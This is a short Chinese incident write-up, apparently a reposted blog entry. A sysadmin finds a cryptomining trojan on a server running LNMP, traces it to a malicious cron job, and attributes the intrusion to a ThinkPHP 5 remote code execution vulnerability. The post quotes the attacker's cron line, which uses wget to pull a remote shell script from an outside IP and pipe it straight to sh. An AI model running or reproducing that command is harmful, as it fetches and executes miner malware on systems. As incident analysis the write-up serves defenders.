資訊專欄INFORMATION COLUMN
摘要:再看下的的權限就是的查看下幾個站的日志發現是利用最近爆出的遠程代碼執行漏洞漏洞細節修復一下問題解決但是這個站點是測試站點端口監聽的是,難道現在黑客能開始嗅探非常規端口了來源
昨天發現 一臺服務器突然慢了 top 顯示 幾個進程100%以上的cpu使用
執行命令為 :
/tmp/php -s /tmp/p2.conf
基本可以確定是被掛馬了
下一步確定來源
last 沒有登陸記錄
先干掉這幾個進程,但是幾分鐘之后又出現了
先看看這個木馬想干什么吧
netstat 看到 這個木馬開啟了一個端口和國外的某個ip建立了連接
但是tcpdump了一小會兒 沒有發現任何數據傳遞
這他是想干啥?
繼續查看日志吧
在cron日志中發現了www用戶 有一個crontab定時操作 基本就是這個問題了
wget -q -O - http://83.220.169.247/cr3.sh | sh > /dev/null 2>&1
順著下載了幾個問題,看了看 應該是個挖礦的木馬程序
服務器上的www用戶 是安裝 lnmp 創建的,看了來源很可能就是web漏洞了。
再看/tmp下的php的權限 就是www的
查看 lnmp下幾個站的日志 發現是利用 thinkphp 5最近爆出的遠程代碼執行漏洞
漏洞細節:https://nosec.org/home/detail...
修復一下問題解決
但是 這個站點是測試站點 端口監聽的是 8083 ,難道現在黑客能開始嗅探非常規端口了?
來源:https://www.simapple.com/425....
文章版權歸作者所有,未經允許請勿轉載,若此文章存在違規行為,您可以聯系管理員刪除。
轉載請注明本文地址:http://specialneedsforspecialkids.com/yun/29821.html
摘要:微軟雅黑宋體春節剛開始,我們安全,發布了年服務器被挖礦的整體安全分析報告。我們調查分析發現,從網站漏洞被爆出后到修復漏洞的時間約大,一些網站被攻擊的狀況就越嚴重,服務器被挖礦的事情就會發生,如果及時的修復漏洞,那么就可以避免被挖礦。春節剛開始,我們SINE安全,發布了2018年服務器被挖礦的整體安全分析報告。該安全報告主要是以我們去年的整一年的安全數據為基礎,對這些服務器的被挖礦的整體情況進...
摘要:為了進一步確認,再次到威脅情報平臺進行查詢。再結合我部署的容器停止時間進行分析,應該是在我部署完成后幾小時內服務器被入侵的。要從根本上解決問題需要進行溯源分析,避免服務器再次被入侵。結合以上線索以及個人經驗分析,很可能利用的漏洞進行入侵的。 容器為何自動停止? 服務器為何操作卡頓? 進程的神秘連接到底指向何處? 發現——自動停止的容器 某日發現部署在服務器上的一個容器被停掉了,開始以為...
閱讀 1766·2023-04-26 01:41
閱讀 3072·2021-11-23 09:51
閱讀 2733·2021-10-09 09:43
閱讀 9019·2021-09-22 15:13
閱讀 2452·2021-09-07 09:59
閱讀 2624·2019-08-30 15:44
閱讀 1131·2019-08-30 12:45
閱讀 2616·2019-08-30 12:43
